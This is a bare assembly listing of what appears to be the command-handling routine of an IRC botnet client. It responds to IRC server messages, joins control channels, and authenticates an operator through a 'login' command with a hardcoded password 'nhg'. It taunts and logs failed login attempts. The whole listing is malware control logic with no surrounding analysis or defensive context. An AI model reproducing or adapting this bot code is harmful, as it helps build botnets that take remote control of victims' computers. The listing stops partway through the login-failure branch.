var_CE0 = byte ptr -0CE0h
var_CDC = dword ptr -0CDCh
var_CD8 = byte ptr -0CD8h
Count = dword ptr -0CD4h
var_CC8 = byte ptr -0CC8h
var_CB8 = byte ptr -0CB8h
var_C38 = byte ptr -0C38h
var_BB8 = dword ptr -0BB8h
var_BB4 = dword ptr -0BB4h
var_BB0 = dword ptr -0BB0h
var_BAC = dword ptr -0BACh
var_BA8 = dword ptr -0BA8h
var_B9C = dword ptr -0B9Ch
var_B98 = dword ptr -0B98h
var_B90 = dword ptr -0B90h
var_B8C = dword ptr -0B8Ch
var_B88 = dword ptr -0B88h
var_B84 = dword ptr -0B84h
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_B74 = dword ptr -0B74h
var_B70 = dword ptr -0B70h
var_B6C = dword ptr -0B6Ch
var_B68 = dword ptr -0B68h
var_B64 = dword ptr -0B64h
var_B60 = dword ptr -0B60h
var_B5C = dword ptr -0B5Ch
var_B58 = dword ptr -0B58h
var_B54 = dword ptr -0B54h
var_B50 = dword ptr -0B50h
var_B4C = dword ptr -0B4Ch
var_B48 = dword ptr -0B48h
var_B44 = byte ptr -0B44h
var_AC4 = dword ptr -0AC4h
var_AC0 = dword ptr -0AC0h
var_ABC = dword ptr -0ABCh
var_AB8 = dword ptr -0AB8h
var_AB4 = dword ptr -0AB4h
var_AB0 = dword ptr -0AB0h
var_AAC = dword ptr -0AACh
var_AA8 = byte ptr -0AA8h
var_A28 = byte ptr -0A28h
var_9A8 = dword ptr -9A8h
var_9A4 = dword ptr -9A4h
var_9A0 = dword ptr -9A0h
var_99C = dword ptr -99Ch
Parameter = dword ptr -998h
var_994 = byte ptr -994h
var_914 = dword ptr -914h
var_910 = dword ptr -910h
var_90C = dword ptr -90Ch
var_908 = dword ptr -908h
var_904 = dword ptr -904h
var_900 = byte ptr -900h
var_8FC = dword ptr -8FCh
Source = dword ptr -8F8h
var_8F4 = dword ptr -8F4h
var_8F0 = dword ptr -8F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
Str = dword ptr -874h
Str1 = dword ptr -870h
var_86C = dword ptr -86Ch
ThreadId = dword ptr -868h
var_864 = dword ptr -864h
var_860 = byte ptr -860h
var_85F = byte ptr -85Fh
var_85E = byte ptr -85Eh
var_85C = dword ptr -85Ch
Dst = byte ptr -858h
var_658 = byte ptr -658h
var_5D8 = dword ptr -5D8h
var_5D4 = byte ptr -5D4h
var_3D4 = byte ptr -3D4h
var_373 = byte ptr -373h
var_372 = byte ptr -372h
var_36F = byte ptr -36Fh
var_366 = byte ptr -366h
var_362 = byte ptr -362h
var_361 = byte ptr -361h
var_2D4 = dword ptr -2D4h
var_2D0 = byte ptr -2D0h
SubStr = byte ptr -0D0h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Str2 = dword ptr -0A0h
lpFileName = dword ptr -9Ch
var_98 = byte ptr -98h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_20 = byte ptr -20h
var_4 = dword ptr -4
Src = dword ptr 8
s = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
Dest = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 1964h
call __alloca_probe
push esi
mov [ebp+var_BC], 3
and [ebp+ThreadId], 0
and [ebp+var_864], 0
and [ebp+var_4], 0
and [ebp+var_85C], 0
and [ebp+var_C4], 0
push 200h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push 1Bh ; Count
push [ebp+Dest] ; Source
lea eax, [ebp+var_20]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+Src], 0
jnz short loc_40AC6B
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40AC6B: ; CODE XREF: sub_40ABFE+63�j
push 200h ; Size
push 0 ; Val
lea eax, [ebp+var_2D0]
push eax ; Dst
call _memset
add esp, 0Ch
push 1FFh ; Count
push [ebp+Src] ; Source
lea eax, [ebp+var_2D0]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset SubStr ; " :"
lea eax, [ebp+var_2D0]
push eax ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_2D4], eax
push 1FFh ; Count
lea eax, [ebp+var_2D0]
push eax ; Source
lea eax, [ebp+var_5D4]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset Delim ; " "
lea eax, [ebp+var_5D4]
push eax ; Str
call _strtok
pop ecx
pop ecx
mov [ebp+Str2], eax
mov [ebp+var_5D8], 1
jmp short loc_40ACFE
; ---------------------------------------------------------------------------
loc_40ACF1: ; CODE XREF: sub_40ABFE+124�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40ACFE: ; CODE XREF: sub_40ABFE+F1�j
cmp [ebp+var_5D8], 20h
jge short loc_40AD24
push offset asc_421F04 ; " "
push 0 ; Str
call _strtok
pop ecx
pop ecx
mov ecx, [ebp+var_5D8]
mov [ebp+ecx*4+Str2], eax
jmp short loc_40ACF1
; ---------------------------------------------------------------------------
loc_40AD24: ; CODE XREF: sub_40ABFE+107�j
cmp [ebp+Str2], 0
jz short loc_40AD36
cmp [ebp+lpFileName], 0
jnz short loc_40AD3E
loc_40AD36: ; CODE XREF: sub_40ABFE+12D�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40AD3E: ; CODE XREF: sub_40ABFE+136�j
push 100h ; Size
push 0 ; Val
lea eax, [ebp+var_3D4]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+var_5D8], 1Fh
jmp short loc_40AD6D
; ---------------------------------------------------------------------------
loc_40AD60: ; CODE XREF: sub_40ABFE+18C�j
; sub_40ABFE:loc_40AE13�j
mov eax, [ebp+var_5D8]
dec eax
mov [ebp+var_5D8], eax
loc_40AD6D: ; CODE XREF: sub_40ABFE+160�j
cmp [ebp+var_5D8], 0
jl loc_40AE18
mov eax, [ebp+var_5D8]
cmp [ebp+eax*4+Str2], 0
jnz short loc_40AD8C
jmp short loc_40AD60
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: sub_40ABFE+18A�j
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
movsx eax, byte ptr [eax]
cmp eax, 2Dh
jnz short loc_40AE11
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
movsx eax, byte ptr [eax+2]
test eax, eax
jnz short loc_40AE11
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
movsx eax, byte ptr [eax+1]
mov [ebp+eax+var_3D4], 1
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
and byte ptr [eax], 0
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
and byte ptr [eax+1], 0
mov eax, [ebp+var_5D8]
mov eax, [ebp+eax*4+Str2]
and byte ptr [eax+2], 0
mov eax, [ebp+var_5D8]
and [ebp+eax*4+Str2], 0
jmp short loc_40AE13
; ---------------------------------------------------------------------------
loc_40AE11: ; CODE XREF: sub_40ABFE+1A1�j
; sub_40ABFE+1B6�j
jmp short loc_40AE18
; ---------------------------------------------------------------------------
loc_40AE13: ; CODE XREF: sub_40ABFE+211�j
jmp loc_40AD60
; ---------------------------------------------------------------------------
loc_40AE18: ; CODE XREF: sub_40ABFE+176�j
; sub_40ABFE:loc_40AE11�j
movzx eax, [ebp+var_361]
test eax, eax
jz short loc_40AE2A
mov [ebp+var_4], 1
loc_40AE2A: ; CODE XREF: sub_40ABFE+223�j
movzx eax, [ebp+var_366]
test eax, eax
jz short loc_40AE43
and [ebp+var_4], 0
mov [ebp+var_85C], 1
loc_40AE43: ; CODE XREF: sub_40ABFE+235�j
mov eax, [ebp+Str2]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_40AE94
push 7Fh ; Count
push [ebp+Str2] ; Source
lea eax, [ebp+var_658]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 17h ; Count
mov eax, [ebp+Str2]
inc eax
push eax ; Source
lea eax, [ebp+var_B8]
push eax ; Dest
call _strncpy
add esp, 0Ch
push offset asc_421F08 ; "!"
lea eax, [ebp+var_B8]
push eax ; Str
call _strtok
pop ecx
pop ecx
loc_40AE94: ; CODE XREF: sub_40ABFE+251�j
push [ebp+Str2] ; Str2
push offset Str1 ; "PING"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40AEF0
mov eax, [ebp+Str2]
mov byte ptr [eax+1], 4Fh
push [ebp+lpFileName] ; char
push offset aPongS ; "PONG %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
mov eax, [ebp+arg_20]
cmp dword ptr [eax], 0
jnz short loc_40AEE8
push [ebp+arg_C]
push dword ptr [ebp+arg_8] ; char
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
loc_40AEE8: ; CODE XREF: sub_40ABFE+2D2�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40AEF0: ; CODE XREF: sub_40ABFE+2AA�j
push [ebp+lpFileName] ; Str2
push offset a001 ; "001"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40AF1C
push [ebp+lpFileName] ; Str2
push offset a005 ; "005"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40AF6F
loc_40AF1C: ; CODE XREF: sub_40ABFE+306�j
push [ebp+Dest] ; char
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push offset aIupX ; "+iup-x"
push [ebp+Dest] ; char
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
push [ebp+arg_C]
push dword ptr [ebp+arg_8] ; char
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
mov dword_470254, 1
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40AF6F: ; CODE XREF: sub_40ABFE+31C�j
push [ebp+lpFileName] ; Str2
push offset a302 ; "302"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40AFC6
push offset a@ ; "@"
push [ebp+var_94] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_86C], eax
cmp [ebp+var_86C], 0
jz short loc_40AFBE
push 9Fh ; Count
mov eax, [ebp+var_86C]
inc eax
push eax ; Source
push [ebp+arg_1C] ; Dest
call _strncpy
add esp, 0Ch
loc_40AFBE: ; CODE XREF: sub_40ABFE+3A6�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40AFC6: ; CODE XREF: sub_40ABFE+385�j
push [ebp+lpFileName] ; Str2
push offset a433 ; "433"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B00A
push 0 ; Str1
push dword_421C4C ; int
push [ebp+Dest] ; Dest
call sub_40FD9A
add esp, 0Ch
push [ebp+Dest] ; char
push offset aNickS ; "NICK %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B00A: ; CODE XREF: sub_40ABFE+3DC�j
and [ebp+var_5D8], 0
jmp short loc_40B020
; ---------------------------------------------------------------------------
loc_40B013: ; CODE XREF: sub_40ABFE:loc_40B054�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B020: ; CODE XREF: sub_40ABFE+413�j
cmp [ebp+var_5D8], 2
jge short loc_40B056
lea eax, [ebp+var_658]
push eax ; Str2
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B054
mov [ebp+var_864], 1
loc_40B054: ; CODE XREF: sub_40ABFE+44A�j
jmp short loc_40B013
; ---------------------------------------------------------------------------
loc_40B056: ; CODE XREF: sub_40ABFE+429�j
push [ebp+lpFileName] ; Str2
push offset aKick ; "KICK"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B18F
and [ebp+var_5D8], 0
jmp short loc_40B086
; ---------------------------------------------------------------------------
loc_40B079: ; CODE XREF: sub_40ABFE+4A9�j
; sub_40ABFE:loc_40B152�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B086: ; CODE XREF: sub_40ABFE+479�j
cmp [ebp+var_5D8], 2
jge loc_40B157
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jnz short loc_40B0A9
jmp short loc_40B079
; ---------------------------------------------------------------------------
loc_40B0A9: ; CODE XREF: sub_40ABFE+4A7�j
push 7Fh ; Count
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Source
lea eax, [ebp+var_658]
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+var_B8]
mov [ebp+Str1], eax
cmp [ebp+Str1], 0
jz short loc_40B152
cmp [ebp+var_94], 0
jz short loc_40B152
push [ebp+var_94] ; Str2
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B152
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
and byte ptr [ecx+eax], 0
push [ebp+Str1]
push offset dword_421F88 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push [ebp+Str1] ; char
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40B152: ; CODE XREF: sub_40ABFE+4DE�j
; sub_40ABFE+4E7�j ...
jmp loc_40B079
; ---------------------------------------------------------------------------
loc_40B157: ; CODE XREF: sub_40ABFE+48F�j
push [ebp+var_94] ; Str2
push [ebp+Dest] ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B187
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
push [ebp+arg_C]
push dword ptr [ebp+arg_8] ; char
push offset aJoinSS_1 ; "JOIN %s %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
loc_40B187: ; CODE XREF: sub_40ABFE+56B�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B18F: ; CODE XREF: sub_40ABFE+46C�j
push [ebp+lpFileName] ; Str2
push offset aNick ; "NICK"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B3B7
lea eax, [ebp+var_B8]
mov [ebp+var_878], eax
mov eax, dword ptr [ebp+var_98]
inc eax
mov [ebp+Str], eax
and [ebp+var_5D8], 0
jmp short loc_40B1D8
; ---------------------------------------------------------------------------
loc_40B1CB: ; CODE XREF: sub_40ABFE:loc_40B271�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B1D8: ; CODE XREF: sub_40ABFE+5CB�j
cmp [ebp+var_5D8], 2
jge loc_40B276
lea eax, [ebp+var_658]
push eax ; Str2
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B271
push 21h ; Val
lea eax, [ebp+var_658]
push eax ; Str
call _strchr
pop ecx
pop ecx
mov [ebp+var_87C], eax
cmp [ebp+var_87C], 0
jz short loc_40B271
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
mov byte ptr [ecx+eax], 3Ah
push [ebp+Str] ; Source
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
lea eax, [ecx+eax+1]
push eax ; Dest
call _strcpy
pop ecx
pop ecx
push [ebp+var_87C] ; Source
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
lea eax, [ecx+eax+2]
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_40B271: ; CODE XREF: sub_40ABFE+606�j
; sub_40ABFE+625�j
jmp loc_40B1CB
; ---------------------------------------------------------------------------
loc_40B276: ; CODE XREF: sub_40ABFE+5E1�j
cmp [ebp+var_878], 0
jz loc_40B3AF
cmp [ebp+Str], 0
jz loc_40B3AF
push [ebp+Dest] ; Str2
push [ebp+var_878] ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B2BF
push 0Fh ; Count
push [ebp+Str] ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 0Ch
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B2BF: ; CODE XREF: sub_40ABFE+6A4�j
and [ebp+var_5D8], 0
jmp short loc_40B2D5
; ---------------------------------------------------------------------------
loc_40B2C8: ; CODE XREF: sub_40ABFE:loc_40B3AA�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B2D5: ; CODE XREF: sub_40ABFE+6C8�j
cmp [ebp+var_5D8], 2
jge loc_40B3AF
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jz loc_40B3AA
lea eax, [ebp+var_658]
push eax ; Str2
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B3AA
push 21h ; Val
lea eax, [ebp+var_658]
push eax ; Str
call _strchr
pop ecx
pop ecx
mov [ebp+var_8E4], eax
cmp [ebp+var_8E4], 0
jz short loc_40B35F
push [ebp+Str] ; Str
call _strlen
pop ecx
mov esi, eax
push [ebp+var_8E4] ; Str
call _strlen
pop ecx
add esi, eax
cmp esi, 7Eh
jbe short loc_40B367
loc_40B35F: ; CODE XREF: sub_40ABFE+73E�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B367: ; CODE XREF: sub_40ABFE+75F�j
push [ebp+var_8E4]
push [ebp+Str]
push offset aSS_7 ; ":%s%s"
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Dest
call _sprintf
add esp, 10h
push 0
push 0
lea eax, [ebp+var_8E0]
push eax
push dword ptr [ebp+arg_8]
push [ebp+s]
call sub_40A08D
add esp, 14h
jmp short loc_40B3AF
; ---------------------------------------------------------------------------
loc_40B3AA: ; CODE XREF: sub_40ABFE+6F6�j
; sub_40ABFE+71B�j
jmp loc_40B2C8
; ---------------------------------------------------------------------------
loc_40B3AF: ; CODE XREF: sub_40ABFE+67F�j
; sub_40ABFE+68C�j ...
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B3B7: ; CODE XREF: sub_40ABFE+5A5�j
push [ebp+lpFileName] ; Str2
push offset aPart ; "PART"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40B3E7
push [ebp+lpFileName] ; Str2
push offset aQuit_0 ; "QUIT"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B4BC
loc_40B3E7: ; CODE XREF: sub_40ABFE+7CD�j
and [ebp+var_5D8], 0
jmp short loc_40B3FD
; ---------------------------------------------------------------------------
loc_40B3F0: ; CODE XREF: sub_40ABFE:loc_40B4B7�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40B3FD: ; CODE XREF: sub_40ABFE+7F0�j
cmp [ebp+var_5D8], 2
jge loc_40B4BC
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
movsx eax, byte ptr [ecx+eax]
test eax, eax
jz loc_40B4B7
push [ebp+Str2] ; Str2
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
add ecx, eax
push ecx ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B4B7
mov eax, [ebp+var_5D8]
shl eax, 7
mov ecx, [ebp+arg_18]
and byte ptr [ecx+eax], 0
lea eax, [ebp+var_B8]
push eax
push offset dword_421FF8 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push [ebp+lpFileName] ; Str2
push offset aPart_0 ; "PART"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B4AF
lea eax, [ebp+Dst]
push eax
mov eax, [ebp+Str2]
inc eax
push eax ; char
push offset aNoticeSS_0 ; "NOTICE %s :%s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
loc_40B4AF: ; CODE XREF: sub_40ABFE+890�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B4B7: ; CODE XREF: sub_40ABFE+81E�j
; sub_40ABFE+842�j
jmp loc_40B3F0
; ---------------------------------------------------------------------------
loc_40B4BC: ; CODE XREF: sub_40ABFE+7E3�j
; sub_40ABFE+806�j
push [ebp+lpFileName] ; Str2
push offset a353 ; "353"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B509
push dword ptr [ebp+var_90] ; Str2
push dword ptr [ebp+arg_8] ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B4EF
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40B4EF: ; CODE XREF: sub_40ABFE+8E6�j
push dword ptr [ebp+var_90] ; char
push offset dword_422044 ; Format
call sub_4091D3
pop ecx
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B509: ; CODE XREF: sub_40ABFE+8D2�j
push [ebp+lpFileName] ; Str2
push offset aPrivmsg_0 ; "PRIVMSG"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40B55C
push [ebp+lpFileName] ; Str2
push offset aNotice_0 ; "NOTICE"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40B55C
push [ebp+lpFileName] ; Str2
push offset a332 ; "332"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40F50F
cmp dword_421C3C, 0
jz loc_40F50F
loc_40B55C: ; CODE XREF: sub_40ABFE+91F�j
; sub_40ABFE+935�j
push [ebp+lpFileName] ; Str2
push offset aPrivmsg_1 ; "PRIVMSG"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40B58C
push [ebp+lpFileName] ; Str2
push offset aNotice_1 ; "NOTICE"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B788
loc_40B58C: ; CODE XREF: sub_40ABFE+972�j
push [ebp+lpFileName] ; Str2
push offset aNotice_2 ; "NOTICE"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B5AC
mov [ebp+var_85C], 1
loc_40B5AC: ; CODE XREF: sub_40ABFE+9A2�j
cmp dword ptr [ebp+var_98], 0
jnz short loc_40B5BD
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B5BD: ; CODE XREF: sub_40ABFE+9B5�j
push offset asc_4220A0 ; "#"
push dword ptr [ebp+var_98] ; Str
call _strstr
pop ecx
pop ecx
test eax, eax
jz short loc_40B5DC
cmp [ebp+var_85C], 0
jz short loc_40B5E8
loc_40B5DC: ; CODE XREF: sub_40ABFE+9D3�j
lea eax, [ebp+var_B8]
mov dword ptr [ebp+var_98], eax
loc_40B5E8: ; CODE XREF: sub_40ABFE+9DC�j
cmp [ebp+var_94], 0
jnz short loc_40B5F9
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B5F9: ; CODE XREF: sub_40ABFE+9F1�j
mov eax, [ebp+var_94]
inc eax
mov [ebp+var_94], eax
cmp [ebp+var_94], 0
jz short loc_40B64C
cmp [ebp+Dest], 0
jz short loc_40B64C
lea eax, [ebp+var_20]
push eax ; Str
call _strlen
pop ecx
push eax ; MaxCount
push [ebp+var_94] ; Str2
lea eax, [ebp+var_20]
push eax ; Str1
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40B642
mov [ebp+var_BC], 4
jmp short loc_40B64C
; ---------------------------------------------------------------------------
loc_40B642: ; CODE XREF: sub_40ABFE+A36�j
mov [ebp+var_BC], 3
loc_40B64C: ; CODE XREF: sub_40ABFE+A0F�j
; sub_40ABFE+A15�j ...
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+Str2], 0
jnz short loc_40B664
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B664: ; CODE XREF: sub_40ABFE+A5C�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset dword_4220A4 ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40B786
mov eax, dword ptr [ebp+var_98]
movsx eax, byte ptr [eax]
cmp eax, 23h
jz loc_40B720
mov eax, dword_470258
mov eax, off_421D40[eax*4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40B720
mov eax, dword_470258
push off_421D40[eax*4]
push dword ptr [ebp+var_98] ; char
push offset dword_4220B0 ; Format
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
lea eax, [ebp+var_B8]
push eax
push offset aSHasJustVersio ; "%s has just versioned me."
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
cmp [ebp+var_864], 0
jnz short loc_40B718
push 0
push 1
lea eax, [ebp+Dst]
push eax
push offset aNhg_0 ; "#!nhg!#"
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40B718: ; CODE XREF: sub_40ABFE+AFD�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B720: ; CODE XREF: sub_40ABFE+A93�j
; sub_40ABFE+AAA�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset dword_4220E8 ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40B786
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40B786
mov eax, dword ptr [ebp+var_98]
movsx eax, byte ptr [eax]
cmp eax, 23h
jz short loc_40B786
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push dword ptr [ebp+var_98] ; char
push offset dword_4220F0 ; Format
push [ebp+s] ; int
call sub_40A03C
add esp, 10h
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B786: ; CODE XREF: sub_40ABFE+A81�j
; sub_40ABFE+B3D�j ...
jmp short loc_40B7AB
; ---------------------------------------------------------------------------
loc_40B788: ; CODE XREF: sub_40ABFE+988�j
mov [ebp+var_BC], 4
mov eax, dword ptr [ebp+var_90]
inc eax
mov dword ptr [ebp+var_90], eax
mov eax, [ebp+var_94]
mov dword ptr [ebp+var_98], eax
loc_40B7AB: ; CODE XREF: sub_40ABFE:loc_40B786�j
mov eax, [ebp+var_BC]
mov eax, [ebp+eax*4+Str2]
movsx eax, byte ptr [eax]
movsx ecx, byte_421C44
mov edx, [ebp+var_BC]
mov edx, [ebp+edx*4+Str2]
inc edx
mov esi, [ebp+var_BC]
mov [ebp+esi*4+Str2], edx
cmp eax, ecx
jz short loc_40B7E9
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B7E9: ; CODE XREF: sub_40ABFE+BE1�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aLogin ; "login"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40BA9C
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+lpFileName], 0
jz short loc_40B823
cmp [ebp+var_864], 0
jz short loc_40B82B
loc_40B823: ; CODE XREF: sub_40ABFE+C1A�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40B82B: ; CODE XREF: sub_40ABFE+C23�j
push offset asc_422108 ; "!"
push [ebp+Str2] ; Str
call _strtok
pop ecx
pop ecx
inc eax
mov [ebp+var_8EC], eax
push offset byte_470260 ; Delim
push 0 ; Str
call _strtok
pop ecx
pop ecx
mov [ebp+var_8F0], eax
push offset asc_42210C ; "~"
push [ebp+var_8F0] ; Str
call _strtok
pop ecx
pop ecx
mov [ebp+var_8F0], eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
push offset aNhg_1 ; "nhg"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40B8FD
push [ebp+var_8F0]
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_B8]
push eax ; char
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 14h
lea eax, [ebp+var_B8]
push eax ; char
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push [ebp+var_8F0]
push [ebp+var_8EC]
push offset dword_42215C ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
